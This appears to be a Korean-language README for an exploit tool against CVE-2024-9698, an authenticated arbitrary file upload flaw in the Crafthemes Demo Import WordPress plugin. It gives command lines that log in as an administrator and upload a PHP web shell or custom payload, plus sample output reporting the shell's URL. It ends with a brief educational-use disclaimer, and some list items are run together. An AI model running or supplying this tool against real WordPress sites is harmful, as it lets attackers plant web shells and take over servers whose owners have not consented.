
Crafthemes Demo Import <= 3.3 - 인증된 ( 관리자+) process_uploaded_files에서의 임의 파일 업로드
이 익스플로잇은 WordPress용 Crafthemes Demo Import 플러그인의 치명적인 취약점(CVE-2024-9698)을 대상으로 합니다. 이 취약점으로 인해 인증된 관리자가 영향을 받는 WordPress 사이트에 임의의 파일을 업로드할 수 있으며, 잠재적으로 **원격 코드 실행(RCE)**이 가능합니다.
process_uploaded_filesreadme.txt에서 정보를 추출하여 플러그인 버전을 확인합니다.admin-ajax.php를 사용하여 사용자 정의 PHP 셸을 업로드합니다.python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password"
사용자 정의 PHP 페이로드를 업로드하려면 다음을 사용하십시오:
python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password" --payload "<?php phpinfo(); ?>"
[+] Target is vulnerable, proceeding with exploit...
[+] Logged in successfully.
[+] Extracted nonce: abc123xyz
[+] Shell uploaded successfully: http://target.com/wp-content/uploads/2025/02/Nxploit.php
면책 조항: 이 스크립트는 오직 교육 및 보안 연구 목적으로만 제공됩니다. 명시적 허가 없이 시스템에 무단으로 사용하는 것은 불법입니다.